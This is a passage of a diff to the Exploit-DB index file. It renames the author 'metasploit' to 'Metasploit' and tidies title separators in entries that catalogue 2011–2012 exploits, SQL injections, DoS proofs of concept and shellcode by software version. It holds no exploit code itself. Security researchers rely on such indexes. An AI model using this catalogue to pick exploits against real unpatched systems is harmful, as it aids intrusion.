18064,platforms/linux/local/18064.sh,"Calibre E-Book Reader - Local Root Exploit (1)",2011-11-02,zx2c4,linux,local,0 -18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 (loggedInUser) Remote SQL Injection",2011-11-02,LiquidWorm,php,webapps,0 +18065,platforms/php/webapps/18065.txt,"SetSeed CMS 5.8.20 - (loggedInUser) Remote SQL Injection",2011-11-02,LiquidWorm,php,webapps,0 18066,platforms/php/webapps/18066.txt,"CaupoShop Pro (2.x/ <= 3.70) Classic 3.01 - Local File Include",2011-11-02,"Rami Salama",php,webapps,0 18067,platforms/windows/local/18067.txt,"Microsoft Excel 2007 SP2 - Buffer Overwrite Exploit",2011-11-02,Abysssec,windows,local,0 18069,platforms/php/webapps/18069.txt,"Jara 1.6 - Multiple Vulnerabilities",2011-11-03,Or4nG.M4N,php,webapps,0 @@ -15705,12 +15705,12 @@ id,file,description,date,author,platform,type,port 18079,platforms/hardware/remote/18079.pl,"DreamBox DM800 1.5rc1 - Remote Root File Disclosure Exploit",2011-11-04,"Todor Donev",hardware,remote,0 18080,platforms/linux/local/18080.c,"Linux Kernel <= 2.6.37-rc1 - serial_multiport_struct Local Info Leak Exploit",2011-11-04,"Todor Donev",linux,local,0 18081,platforms/php/webapps/18081.txt,"WHMCS 3.x.x - (clientarea.php) Local File Disclosure",2011-11-04,"red virus",php,webapps,0 -18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (3)",2011-11-04,metasploit,windows,local,0 +18082,platforms/windows/local/18082.rb,"Mini-Stream 3.0.1.1 - Buffer Overflow Exploit (3)",2011-11-04,Metasploit,windows,local,0 18083,platforms/php/webapps/18083.php,"Zenphoto <= 1.4.1.4 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18084,platforms/php/webapps/18084.php,"phpMyFAQ <= 2.7.0 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18085,platforms/php/webapps/18085.php,"aidiCMS 3.55 - (ajax_create_folder.php) Remote Code Execution",2011-11-05,EgiX,php,webapps,0 18086,platforms/linux/local/18086.c,"Calibre E-Book Reader - Local Root",2011-11-05,zx2c4,linux,local,0 -18087,platforms/windows/local/18087.rb,"Microsoft Office 2007 Excel .xlb Buffer Overflow (MS11-021)",2011-11-05,metasploit,windows,local,0 +18087,platforms/windows/local/18087.rb,"Microsoft Office 2007 Excel .xlb Buffer Overflow (MS11-021)",2011-11-05,Metasploit,windows,local,0 18088,platforms/php/webapps/18088.txt,"WHMCompleteSolution 3.x/4.x - Multiple Vulnerabilities",2011-11-07,ZxH-Labs,php,webapps,0 18089,platforms/windows/remote/18089.rb,"KnFTP 1.0 - Buffer Overflow Exploit (DEP Bypass)",2011-11-07,pasta,windows,remote,0 18090,platforms/php/webapps/18090.txt,"LabStoRe <= 1.5.4 - SQL Injection",2011-11-07,muuratsalo,php,webapps,0 @@ -15723,39 +15723,39 @@ id,file,description,date,author,platform,type,port 18100,platforms/php/webapps/18100.txt,"labwiki <= 1.1 - Multiple Vulnerabilities",2011-11-09,muuratsalo,php,webapps,0 18101,platforms/hardware/webapps/18101.pl,"Comtrend Router CT-5624 - Remote Root/Support Password Disclosure/Change Exploit",2011-11-09,"Todor Donev",hardware,webapps,0 18102,platforms/windows/remote/18102.rb,"AbsoluteFTP 1.9.6 < 2.2.10 - Remote Buffer Overflow (LIST)",2011-11-09,Node,windows,remote,0 -18108,platforms/php/webapps/18108.rb,"Support Incident Tracker <= 3.65 - Remote Command Execution",2011-11-13,metasploit,php,webapps,0 +18108,platforms/php/webapps/18108.rb,"Support Incident Tracker <= 3.65 - Remote Command Execution",2011-11-13,Metasploit,php,webapps,0 18105,platforms/linux/local/18105.sh,"glibc LD_AUDIT arbitrary DSO - Load Privilege Escalation",2011-11-10,zx2c4,linux,local,0 18106,platforms/windows/dos/18106.pl,"Soda PDF Professional 1.2.155 PDF/WWF File Handling DoS",2011-11-11,LiquidWorm,windows,dos,0 18107,platforms/windows/dos/18107.py,"Kool Media Converter 2.6.0 - DoS",2011-11-11,swami,windows,dos,0 -18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Stack Buffer Overflow",2011-11-13,metasploit,windows,local,0 +18109,platforms/windows/local/18109.rb,"Aviosoft Digital TV Player Professional 1.0 - Stack Buffer Overflow",2011-11-13,Metasploit,windows,local,0 18110,platforms/php/webapps/18110.txt,"CMS 4.x.x Zorder (SQL Injection Vul)",2011-11-13,"KraL BeNiM",php,webapps,0 18119,platforms/windows/dos/18119.rb,"Attachmate Reflection FTP Client Heap Overflow",2011-11-16,"Francis Provencher",windows,dos,0 18120,platforms/linux/dos/18120.py,"FleaHttpd Remote Denial of Service Exploit",2011-11-16,condis,linux,dos,80 18111,platforms/php/webapps/18111.php,"WordPress Zingiri Plugin <= 2.2.3 - (ajax_save_name.php) Remote Code Execution",2011-11-13,EgiX,php,webapps,0 -18132,platforms/php/webapps/18132.php,"Support Incident Tracker <= 3.65 (translate.php) Remote Code Execution",2011-11-19,EgiX,php,webapps,0 +18132,platforms/php/webapps/18132.php,"Support Incident Tracker <= 3.65 - (translate.php) Remote Code Execution",2011-11-19,EgiX,php,webapps,0 18112,platforms/windows/dos/18112.txt,"optima apiftp server <= 1.5.2.13 - Multiple Vulnerabilities",2011-11-14,"Luigi Auriemma",windows,dos,0 -18113,platforms/windows/local/18113.rb,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.pls) Stack Buffer Overflow",2011-11-14,metasploit,windows,local,0 +18113,platforms/windows/local/18113.rb,"Mini-Stream RM-MP3 Converter 3.1.2.1 - (.pls) Stack Buffer Overflow",2011-11-14,Metasploit,windows,local,0 18114,platforms/php/webapps/18114.txt,"WordPress AdRotate plugin <= 3.6.6 - SQL Injection",2011-11-14,"Miroslav Stampar",php,webapps,0 18115,platforms/php/webapps/18115.txt,"Pixie CMS 1.01 < 1.04 - Blind SQL Injections",2011-11-14,Piranha,php,webapps,0 18116,platforms/multiple/dos/18116.html,"Firefox 8.0 Null Pointer Dereference PoC",2011-11-14,0in,multiple,dos,0 18117,platforms/multiple/webapps/18117.txt,"Authenex A-Key/ASAS Web Management Control 3.1.0.2 - Time-based SQL Injection",2011-11-15,"Jose Carlos de Arriba",multiple,webapps,0 18118,platforms/php/webapps/18118.txt,"QuiXplorer 2.3 - Bugtraq File Upload",2011-11-15,PCA,php,webapps,0 -18121,platforms/php/webapps/18121.txt,"FreeWebshop <= 2.2.9 R2 (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 +18121,platforms/php/webapps/18121.txt,"FreeWebshop <= 2.2.9 R2 - (ajax_save_name.php) Remote Code Execution",2011-11-16,EgiX,php,webapps,0 18122,platforms/hardware/webapps/18122.txt,"SonicWALL Aventail SSL-VPN SQL Injection",2011-11-16,"Asheesh kumar",hardware,webapps,0 -18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control",2011-11-17,metasploit,windows,remote,0 +18123,platforms/windows/remote/18123.rb,"Viscom Image Viewer CP Pro 8.0/Gold 6.0 - ActiveX Control",2011-11-17,Metasploit,windows,remote,0 18124,platforms/windows/dos/18124.py,"Thunder Kankan Player 4.8.3.840 - Stack Overflow/DOS Exploit",2011-11-18,hellok,windows,dos,0 -18125,platforms/windows/remote/18125.rb,"Wireshark console.lua pre-loading",2011-11-19,metasploit,windows,remote,0 +18125,platforms/windows/remote/18125.rb,"Wireshark console.lua pre-loading",2011-11-19,Metasploit,windows,remote,0 18126,platforms/php/webapps/18126.txt,"WordPress jetpack Plugin - 'sharedaddy.php' ID SQL Injection",2011-11-19,longrifle0x,php,webapps,0 18127,platforms/php/webapps/18127.txt,"Freelancer calendar <= 1.01 SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18128,platforms/php/webapps/18128.txt,"Valid tiny-erp <= 1.6 - SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18129,platforms/php/webapps/18129.txt,"Blogs manager <= 1.101 SQL Injection",2011-11-19,muuratsalo,php,webapps,0 18131,platforms/php/webapps/18131.txt,"ARASTAR - SQL Injection",2011-11-19,TH3_N3RD,php,webapps,0 -18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,metasploit,windows,remote,0 +18134,platforms/windows/remote/18134.rb,"Viscom Software Movie Player Pro SDK ActiveX 6.8",2011-11-20,Metasploit,windows,remote,0 18137,platforms/win_x86/local/18137.rb,"QQPLAYER Player 3.2 - PICT PnSize Buffer Overflow Windows DEP_ASLR BYPASS",2011-11-21,hellok,win_x86,local,0 18138,platforms/windows/remote/18138.txt,"VMware Update Manager Directory Traversal",2011-11-21,"Alexey Sintsov",windows,remote,0 18140,platforms/windows/dos/18140.c,"Winows 7 keylayout - Blue Screen",2011-11-21,instruder,windows,dos,0 -18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow",2011-11-22,metasploit,windows,local,0 -18143,platforms/windows/local/18143.rb,"Microsoft Office Excel Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,metasploit,windows,local,0 +18142,platforms/windows/local/18142.rb,"Free MP3 CD Ripper 1.1 - (WAV File) Stack Buffer Overflow",2011-11-22,Metasploit,windows,local,0 +18143,platforms/windows/local/18143.rb,"Microsoft Office Excel Malformed OBJ Record Handling Overflow (MS11-038)",2011-11-22,Metasploit,windows,local,0 18145,platforms/linux/remote/18145.py,"Wireshark <= 1.4.4 - DECT Dissector Remote Buffer Overflow",2011-11-22,ipv,linux,remote,0 18147,platforms/linux/local/18147.c,"bzexe (bzip2) race condition",2011-11-23,vladz,linux,local,0 18148,platforms/php/webapps/18148.pl,"PHP-Nuke <= 8.1.0.3.5b (Downloads) Remote Blind SQL Injection",2011-11-23,Dante90,php,webapps,0 @@ -15772,8 +15772,8 @@ id,file,description,date,author,platform,type,port 18165,platforms/windows/dos/18165.txt,"siemens automation license manager <= 500.0.122.1 - Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18166,platforms/windows/dos/18166.txt,"Siemens SIMATIC WinCC Flexible (Runtime) Multiple Vulnerabilities",2011-11-28,"Luigi Auriemma",windows,dos,0 18167,platforms/php/webapps/18167.zip,"Bypass the JQuery-Real-Person captcha plugin (0Day)",2011-11-28,Alberto_García_Illera,php,webapps,0 -18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,metasploit,multiple,remote,0 -18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 / 4300 - Command Execution",2011-11-30,metasploit,hardware,remote,0 +18171,platforms/multiple/remote/18171.rb,"Java Applet Rhino Script Engine Remote Code Execution",2011-11-30,Metasploit,multiple,remote,0 +18172,platforms/hardware/remote/18172.rb,"CTEK SkyRouter 4200 / 4300 - Command Execution",2011-11-30,Metasploit,hardware,remote,0 18173,platforms/windows/dos/18173.pl,"Bugbear FlatOut 2005 Malformed .bed file Buffer Overflow",2011-11-30,Silent_Dream,windows,dos,0 18174,platforms/windows/local/18174.py,"GOM Player 2.1.33.5071 ASX File Unicode Stack Buffer Overflow Exploit",2011-11-30,"Debasish Mandal",windows,local,0 18176,platforms/windows/local/18176.py,"Microsoft Windows XP/2003 - afd.sys Local Privilege Escalation Exploit (MS11-080)",2011-11-30,ryujin,windows,local,0 @@ -15789,22 +15789,22 @@ id,file,description,date,author,platform,type,port 18187,platforms/windows/remote/18187.c,"CoDeSys SCADA 2.3 - Remote Exploit",2011-12-01,"Celil Ünüver",windows,remote,0 18188,platforms/windows/dos/18188.txt,"Hillstone Software HS TFTP Server 1.3.2 - Denial of Service",2011-12-02,"SecPod Research",windows,dos,0 18189,platforms/windows/remote/18189.txt,"Ipswitch TFTP Server 1.0.0.24 - Directory Traversal",2011-12-02,"SecPod Research",windows,remote,0 -18190,platforms/windows/remote/18190.rb,"Serv-U FTP Server < 4.2 - Buffer Overflow",2011-12-02,metasploit,windows,remote,0 +18190,platforms/windows/remote/18190.rb,"Serv-U FTP Server < 4.2 - Buffer Overflow",2011-12-02,Metasploit,windows,remote,0 18192,platforms/php/webapps/18192.txt,"Joomla Jobprofile Component (com_jobprofile) - SQL Injection",2011-12-02,kaMtiEz,php,webapps,0 18193,platforms/php/webapps/18193.txt,"WSN Classifieds 6.2.12 / 6.2.18 - Multiple Vulnerabilities",2011-12-02,d3v1l,php,webapps,0 18200,platforms/windows/dos/18200.txt,"SopCast 3.4.7 sop:// URI Handling Remote Stack Buffer Overflow PoC",2011-12-05,LiquidWorm,windows,dos,0 -18195,platforms/windows/local/18195.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow (.m3u)",2011-12-03,metasploit,windows,local,0 +18195,platforms/windows/local/18195.rb,"CCMPlayer 1.5 - Stack based Buffer Overflow (.m3u)",2011-12-03,Metasploit,windows,local,0 18196,platforms/windows/dos/18196.py,"NJStar Communicator MiniSmtp - Buffer Overflow [ASLR Bypass]",2011-12-03,Zune,windows,dos,0 18197,platforms/lin_x86-64/shellcode/18197.c,"Linux/x86-64 - execve(/bin/sh) shellcode (52 bytes)",2011-12-03,X-h4ck,lin_x86-64,shellcode,0 18199,platforms/hardware/dos/18199.pl,"ShareCenter D-Link DNS-320 - Remote reboot/shutdown/reset (DoS)",2011-12-05,rigan,hardware,dos,0 18198,platforms/php/webapps/18198.php,"Family Connections CMS 2.5.0 & 2.7.1 - (less.php) Remote Command Execution",2011-12-04,mr_me,php,webapps,0 -18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 (Diagnose.exe) Improper Permissions",2011-12-05,LiquidWorm,windows,local,0 +18201,platforms/windows/local/18201.txt,"SopCast 3.4.7 - (Diagnose.exe) Improper Permissions",2011-12-05,LiquidWorm,windows,local,0 18202,platforms/php/webapps/18202.txt,"Meditate Web Content Editor 'username_input' SQL-Injection",2011-12-05,"Stefan Schurtz",php,webapps,0 18207,platforms/php/webapps/18207.txt,"AlstraSoft EPay Enterprise 4.0 - Blind SQL Injection",2011-12-06,Don,php,webapps,0 -18208,platforms/php/webapps/18208.rb,"Family Connections less.php Remote Command Execution",2011-12-07,metasploit,php,webapps,0 +18208,platforms/php/webapps/18208.rb,"Family Connections less.php Remote Command Execution",2011-12-07,Metasploit,php,webapps,0 18215,platforms/php/webapps/18215.txt,"SourceBans <= 1.4.8 SQL/LFI Injection",2011-12-07,Havok,php,webapps,0 18217,platforms/php/webapps/18217.txt,"SantriaCMS - SQL Injection",2011-12-08,Troy,php,webapps,0 -18218,platforms/php/webapps/18218.txt,"QContacts 1.0.6 (Joomla component) SQL injection",2011-12-08,Don,php,webapps,0 +18218,platforms/php/webapps/18218.txt,"QContacts 1.0.6 - (Joomla component) SQL injection",2011-12-08,Don,php,webapps,0 18210,platforms/php/webapps/18210.txt,"Php City Portal Script Software SQL Injection",2011-12-07,Don,php,webapps,0 18212,platforms/php/webapps/18212.txt,"phpBB MyPage Plugin SQL Injection",2011-12-07,CrazyMouse,php,webapps,0 18213,platforms/php/webapps/18213.php,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit",2011-12-07,EgiX,php,webapps,0 @@ -15824,9 +15824,9 @@ id,file,description,date,author,platform,type,port 18233,platforms/php/webapps/18233.txt,"Xoops 2.5.4 - Blind SQL Injection",2011-12-11,blkhtc0rp,php,webapps,0 18235,platforms/windows/remote/18235.pl,"zFTPServer Suite 6.0.0.52 - 'rmdir' Directory Traversal",2011-12-11,"Stefan Schurtz",windows,remote,0 18236,platforms/php/webapps/18236.txt,"Pixie 1.04 - Blog Post CSRF",2011-12-11,hackme,php,webapps,0 -18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit (Metasploit)",2011-12-13,metasploit,php,webapps,0 -18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,metasploit,windows,remote,0 -18243,platforms/php/webapps/18243.rb,"PmWiki <= 2.2.34 - (pagelist) Remote PHP Code Injection Exploit (2)",2011-12-14,metasploit,php,webapps,0 +18239,platforms/php/webapps/18239.rb,"Traq <= 2.3 - Authentication Bypass / Remote Code Execution Exploit (Metasploit)",2011-12-13,Metasploit,php,webapps,0 +18240,platforms/windows/remote/18240.rb,"CoDeSys SCADA 2.3 - Webserver Stack Buffer Overflow",2011-12-13,Metasploit,windows,remote,0 +18243,platforms/php/webapps/18243.rb,"PmWiki <= 2.2.34 - (pagelist) Remote PHP Code Injection Exploit (2)",2011-12-14,Metasploit,php,webapps,0 18246,platforms/php/webapps/18246.txt,"Seotoaster SQL Injection Admin Login Bypass",2011-12-16,"Stefan Schurtz",php,webapps,0 18247,platforms/multiple/webapps/18247.txt,"Capexweb 1.1 - SQL Injection",2011-12-16,"D1rt3 Dud3",multiple,webapps,0 18248,platforms/php/webapps/18248.pl,"mPDF <= 5.3 File Disclosure",2011-12-16,ZadYree,php,webapps,0 @@ -15842,7 +15842,7 @@ id,file,description,date,author,platform,type,port 18261,platforms/php/webapps/18261.txt,"SpamTitan 5.08 - Multiple Vulnerabilities",2011-12-21,Vulnerability-Lab,php,webapps,0 18262,platforms/multiple/webapps/18262.txt,"Plone and Zope Remote Command Execution PoC",2011-12-21,"Nick Miles",multiple,webapps,0 18268,platforms/windows/dos/18268.txt,"FreeSSHd Crash PoC",2011-12-24,Level,windows,dos,0 -18265,platforms/php/webapps/18265.txt,"Tiki Wiki CMS Groupware <= 8.2 (snarf_ajax.php) Remote PHP Code Injection",2011-12-22,EgiX,php,webapps,0 +18265,platforms/php/webapps/18265.txt,"Tiki Wiki CMS Groupware <= 8.2 - (snarf_ajax.php) Remote PHP Code Injection",2011-12-22,EgiX,php,webapps,0 18266,platforms/php/webapps/18266.py,"Open Conference/Journal/Harvester Systems <= 2.3.x - Multiple RCE Vulnerabilities",2011-12-23,mr_me,php,webapps,0 18269,platforms/windows/dos/18269.py,"MySQL 5.5.8 - Remote Denial of Service (DOS)",2011-12-24,Level,windows,dos,0 18270,platforms/windows/dos/18270.py,"Putty 0.60 Crash PoC",2011-12-24,Level,windows,dos,0 @@ -15857,7 +15857,7 @@ id,file,description,date,author,platform,type,port 18283,platforms/windows/remote/18283.rb,"CoCSoft Stream Down 6.8.0 - Universal Exploit (Metasploit)",2011-12-27,"Fady Mohammed Osman",windows,remote,0 18412,platforms/php/webapps/18412.php,"WordPress Kish Guest Posting Plugin 1.0 - Arbitrary File Upload",2012-01-23,EgiX,php,webapps,0 18287,platforms/php/webapps/18287.php,"Joomla Module Simple File Upload 1.3 - Remote Code Execution",2011-12-28,gmda,php,webapps,0 -18285,platforms/windows/dos/18285.py,"VLC 1.1.11 (libav) libavcodec_plugin.dll DoS",2011-12-28,"Mitchell Adair",windows,dos,0 +18285,platforms/windows/dos/18285.py,"VLC 1.1.11 - (libav) libavcodec_plugin.dll DoS",2011-12-28,"Mitchell Adair",windows,dos,0 18288,platforms/php/webapps/18288.txt,"DIY-CMS blog mod SQL Injection",2011-12-29,snup,php,webapps,0 18290,platforms/php/webapps/18290.txt,"Winn Guestbook 2.4.8c - Stored XSS",2011-12-29,G13,php,webapps,0 18291,platforms/hardware/remote/18291.txt,"Reaver WiFi Protected Setup Exploit",2011-12-30,cheffner,hardware,remote,0 @@ -15875,8 +15875,8 @@ id,file,description,date,author,platform,type,port 18308,platforms/php/webapps/18308.txt,"Typo3 4.5-4.7 - Remote Code Execution (RFI/LFI)",2012-01-04,MaXe,php,webapps,0 18309,platforms/windows/dos/18309.pl,"VLC Media Player 1.1.11 - (.amr) Denial of Service PoC",2012-01-04,Fabi@habsec,windows,dos,0 18314,platforms/php/webapps/18314.txt,"Posse Softball Director CMS SQL Injection Vulnerabilitiy",2012-01-04,"H4ckCity Security Team",php,webapps,0 -18983,platforms/php/webapps/18983.php,"Mnews <= 1.1 (view.php) SQL Injection",2012-06-04,WhiteCollarGroup,php,webapps,0 -18984,platforms/multiple/remote/18984.rb,"Apache Struts <= 2.2.1.1 - Remote Command Execution",2012-06-05,metasploit,multiple,remote,0 +18983,platforms/php/webapps/18983.php,"Mnews <= 1.1 - (view.php) SQL Injection",2012-06-04,WhiteCollarGroup,php,webapps,0 +18984,platforms/multiple/remote/18984.rb,"Apache Struts <= 2.2.1.1 - Remote Command Execution",2012-06-05,Metasploit,multiple,remote,0 18318,platforms/windows/dos/18318.py,"Netcut 2.0 - Denial of Service",2012-01-04,MaYaSeVeN,windows,dos,0 18977,platforms/php/dos/18977.php,"PHP 5.3.10 - spl_autoload_register() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 18978,platforms/php/dos/18978.php,"PHP 5.3.10 - spl_autoload_call() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 @@ -15899,7 +15899,7 @@ id,file,description,date,author,platform,type,port 18340,platforms/php/webapps/18340.txt,"Paddelberg Topsite Script Authentication Bypass",2012-01-09,"Christian Inci",php,webapps,0 18341,platforms/php/webapps/18341.txt,"clip bucket 2.6 - Multiple Vulnerabilities",2012-01-09,YaDoY666,php,webapps,0 18342,platforms/php/webapps/18342.txt,"SAPID 1.2.3 Stable Remote File Inclusion",2012-01-09,"Opa Yong",php,webapps,0 -18343,platforms/linux/webapps/18343.pl,"Enigma2 Webinterface 1.7.x 1.6.x 1.5.x (linux) Remote File Disclosure",2012-01-09,"Todor Donev",linux,webapps,0 +18343,platforms/linux/webapps/18343.pl,"Enigma2 Webinterface 1.7.x 1.6.x 1.5.x - (linux) Remote File Disclosure",2012-01-09,"Todor Donev",linux,webapps,0 18344,platforms/php/webapps/18344.txt,"razorCMS 1.2 Path Traversal",2012-01-10,chap0,php,webapps,0 18345,platforms/windows/remote/18345.py,"TFTP Server 1.4 - ST (RRQ) Buffer Overflow Exploit",2012-01-10,b33f,windows,remote,0 18347,platforms/php/webapps/18347.txt,"Pragyan CMS 3.0 - Remote File Disclosure",2012-01-10,Or4nG.M4N,php,webapps,0 @@ -15918,31 +15918,31 @@ id,file,description,date,author,platform,type,port 18370,platforms/multiple/dos/18370.txt,"php 5.3.8 - Multiple Vulnerabilities",2012-01-14,"Maksymilian Arciemowicz",multiple,dos,0 18371,platforms/php/webapps/18371.rb,"phpMyAdmin 3.3.x & 3.4.x - Local File Inclusion via XXE Injection",2012-01-14,"Marco Batista",php,webapps,0 18372,platforms/windows/local/18372.txt,"Microsoft Windows Assembly Execution (MS12-005)",2012-01-14,"Byoungyoung Lee",windows,local,0 -18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH) (Metasploit)",2012-01-17,metasploit,windows,local,0 -18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport Remote Command Execution",2012-01-17,metasploit,windows,remote,0 -18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution",2012-01-14,metasploit,windows,remote,0 -18366,platforms/windows/local/18366.rb,"Adobe Reader U3D Memory Corruption",2012-01-14,metasploit,windows,local,0 -18367,platforms/windows/remote/18367.rb,"XAMPP WebDAV PHP Upload",2012-01-14,metasploit,windows,remote,0 -18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,metasploit,linux,remote,0 -18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,metasploit,bsd,remote,0 -18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel use after free (2)",2012-01-17,metasploit,osx,remote,0 +18375,platforms/windows/local/18375.rb,"BS.Player 2.57 - Buffer Overflow Exploit (Unicode SEH) (Metasploit)",2012-01-17,Metasploit,windows,local,0 +18376,platforms/windows/remote/18376.rb,"McAfee SaaS MyCioScan ShowReport Remote Command Execution",2012-01-17,Metasploit,windows,remote,0 +18365,platforms/windows/remote/18365.rb,"Microsoft Internet Explorer JavaScript OnLoad Handler Remote Code Execution",2012-01-14,Metasploit,windows,remote,0 +18366,platforms/windows/local/18366.rb,"Adobe Reader U3D Memory Corruption",2012-01-14,Metasploit,windows,local,0 +18367,platforms/windows/remote/18367.rb,"XAMPP WebDAV PHP Upload",2012-01-14,Metasploit,windows,remote,0 +18368,platforms/linux/remote/18368.rb,"Linux BSD-derived Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,Metasploit,linux,remote,0 +18369,platforms/bsd/remote/18369.rb,"FreeBSD Telnet Service Encryption Key ID Buffer Overflow",2012-01-14,Metasploit,bsd,remote,0 +18377,platforms/osx/remote/18377.rb,"Mozilla Firefox 3.6.16 - mChannel use after free (2)",2012-01-17,Metasploit,osx,remote,0 18378,platforms/linux/dos/18378.c,"Linux IGMP Remote Denial of Service (Introduced in linux-2.6.36)",2012-01-17,kingcope,linux,dos,0 18379,platforms/lin_x86/shellcode/18379.c,"Linux/x86 - Search For php/html Writable Files and Add Your Code shellcode (380+ bytes)",2012-01-17,rigan,lin_x86,shellcode,0 18380,platforms/php/webapps/18380.txt,"Joomla Discussions Component (com_discussions) SQL Injection",2012-01-17,"Red Security TEAM",php,webapps,0 -18975,platforms/php/webapps/18975.rb,"Log1 CMS - writeInfo() PHP Code Injection",2012-06-03,metasploit,php,webapps,0 +18975,platforms/php/webapps/18975.rb,"Log1 CMS - writeInfo() PHP Code Injection",2012-06-03,Metasploit,php,webapps,0 18976,platforms/php/dos/18976.php,"PHP 5.3.10 - spl_autoload() Local Denial of Service",2012-06-03,"Yakir Wizman",php,dos,0 -18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution",2012-01-18,metasploit,windows,remote,0 +18381,platforms/windows/remote/18381.rb,"HP Easy Printer Care XMLCacheMgr Class ActiveX Control Remote Code Execution",2012-01-18,Metasploit,windows,remote,0 18382,platforms/windows/remote/18382.py,"Sysax Multi Server 5.50 - Create Folder BOF",2012-01-18,"Craig Freyman",windows,remote,0 18383,platforms/php/webapps/18383.txt,"pGB 2.12 kommentar.php SQL Injection",2012-01-18,3spi0n,php,webapps,0 18384,platforms/php/webapps/18384.txt,"PhpBridges Blog System members.php SQL Injection",2012-01-18,3spi0n,php,webapps,0 18385,platforms/php/webapps/18385.txt,"DZCP (deV!L_z Clanportal) Gamebase Addon - SQL Injection",2012-01-18,"Easy Laster",php,webapps,0 18386,platforms/php/webapps/18386.txt,"DZCP (deV!L_z Clanportal) 1.5.5 Moviebase Addon - Blind SQL Injection",2012-01-18,"Easy Laster",php,webapps,0 -18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow",2012-01-20,metasploit,windows,remote,0 +18388,platforms/windows/remote/18388.rb,"HP OpenView Network Node Manager ov.dll _OVBuildPath Buffer Overflow",2012-01-20,Metasploit,windows,remote,0 18389,platforms/php/webapps/18389.txt,"Drupal CKEditor 3.0 < 3.6.2 - Persistent EventHandler XSS",2012-01-19,MaXe,php,webapps,0 18390,platforms/php/webapps/18390.txt,"WordPress Plugin ucan post <= 1.0.09 - Stored XSS",2012-01-19,"Gianluca Brindisi",php,webapps,0 18700,platforms/php/webapps/18700.txt,"e-ticketing - SQL Injection",2012-04-04,"Mark Stanislav",php,webapps,0 18392,platforms/php/webapps/18392.php,"appRain CMF <= 0.1.5 - (uploadify.php) Unrestricted File Upload Exploit",2012-01-19,EgiX,php,webapps,0 -18393,platforms/linux/remote/18393.rb,"Gitorious Arbitrary Command Execution",2012-01-20,metasploit,linux,remote,0 +18393,platforms/linux/remote/18393.rb,"Gitorious Arbitrary Command Execution",2012-01-20,Metasploit,linux,remote,0 18394,platforms/asp/webapps/18394.txt,"ICTimeAttendance Authentication Bypass",2012-01-20,v3n0m,asp,webapps,0 18395,platforms/asp/webapps/18395.txt,"EasyPage SQL Injection",2012-01-20,"Red Security TEAM",asp,webapps,0 18396,platforms/php/webapps/18396.sh,"WhatsApp Status Changer 0.2 - Exploit",2012-01-20,emgent,php,webapps,0 @@ -15951,14 +15951,14 @@ id,file,description,date,author,platform,type,port 18402,platforms/php/webapps/18402.pl,"PHP iReport 1.0 - Remote Html Code injection",2012-01-21,Or4nG.M4N,php,webapps,0 18403,platforms/php/webapps/18403.txt,"Nova CMS Directory Traversal",2012-01-21,"Red Security TEAM",php,webapps,0 18404,platforms/php/webapps/18404.pl,"iSupport 1.x - CSRF HTML Code Injection to Add Admin",2012-01-21,Or4nG.M4N,php,webapps,0 -18399,platforms/windows/dos/18399.py,"VLC 1.2.0 (libtaglib_pluggin.dll) DoS",2012-01-20,"Mitchell Adair",windows,dos,0 +18399,platforms/windows/dos/18399.py,"VLC 1.2.0 - (libtaglib_pluggin.dll) DoS",2012-01-20,"Mitchell Adair",windows,dos,0 18405,platforms/asp/webapps/18405.txt,"ARYADAD - Multiple Vulnerabilities",2012-01-21,"Red Security TEAM",asp,webapps,0 18411,platforms/linux/local/18411.c,"Linux Kernel 2.6.39 <= 3.2.2 (Gentoo / Ubuntu x86/x64) - 'Mempodipper.c' Local Root (1)",2012-01-23,zx2c4,linux,local,0 18407,platforms/php/webapps/18407.txt,"AllWebMenus < 1.1.9 WordPress Menu Plugin - Arbitrary File Upload",2012-01-22,6Scan,php,webapps,0 18410,platforms/php/webapps/18410.txt,"miniCMS 1.0 & 2.0 - PHP Code Inject",2012-01-22,Or4nG.M4N,php,webapps,0 18698,platforms/windows/dos/18698.py,"Xion Audio Player 1.0.127 - (.aiff) Denial of Service",2012-04-04,condis,windows,dos,0 18699,platforms/php/webapps/18699.txt,"PlumeCMS <= 1.2.4 - Multiple Persistent XSS",2012-04-04,"Ivano 